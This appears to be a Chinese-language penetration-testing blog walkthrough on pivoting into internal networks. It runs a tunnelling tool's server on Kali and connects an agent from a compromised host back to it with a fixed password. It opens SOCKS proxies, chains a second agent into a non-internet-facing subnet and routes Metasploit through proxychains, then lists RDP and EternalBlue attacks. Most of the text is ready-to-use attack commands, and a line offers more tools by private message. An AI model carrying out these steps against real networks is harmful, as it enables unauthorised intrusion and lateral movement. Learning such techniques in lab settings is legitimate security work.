目录

渗透带出主机阶段

先把我们的服务端上传到kali

​先把我们的客户端上传到目标机

客户端去连接我们的kali机端口去上线

出现admin，上线成功 

detail相当于msf的sessions​

和msf差不多功能，但是我们用它主要是搞隧道代理 抓发的

​开启socks代理

rce二层内网后继续上传客户端 

进入目标一开启监听1001端口

连接服务端 

​成功上线二层内网主机

进入上线的二层内网开socks代理端口30000​

成功带出192.168.33.22​

kali配置代理，开始攻击 

​远程桌面攻击​编辑

永恒之蓝打 

---

后台私信可获取弹药库

渗透带出主机阶段

先把我们的服务端上传到kali

chmod u+x admin
./admin -l 10000 -s crazy  #-l 10000是开启10000端口，-s crazy是设置的密码

 先把我们的客户端上传到目标机

客户端去连接我们的kali机端口去上线

chmod u+x agent
./agent -c 192.168.20.128:10000 -s crazy

 

出现admin，上线成功 

 

 detail相当于msf的sessions

和msf差不多功能，但是我们用它主要是搞隧道代理 抓发的

 开启socks代理

注意：在我们的上线目标一内网主机上开启

back  #要是想切换上线主机可以back退出一下
use 0
socks 20000

成功带出二层内网主机 

 

rce二层内网后继续上传客户端 

 

进入目标一开启监听1001端口

listen

 连接服务端 

因为二层不出网但是能够联通192.168.22.11

agent -c 192.168.22.11:10001 -s crazy

 成功上线二层内网主机

 进入上线的二层内网开socks代理端口30000

成功带出192.168.33.22

kali配置代理，开始攻击 

 vim /etc/proxychains4.conf

 远程桌面攻击

永恒之蓝打 

 proxychains  msfconsole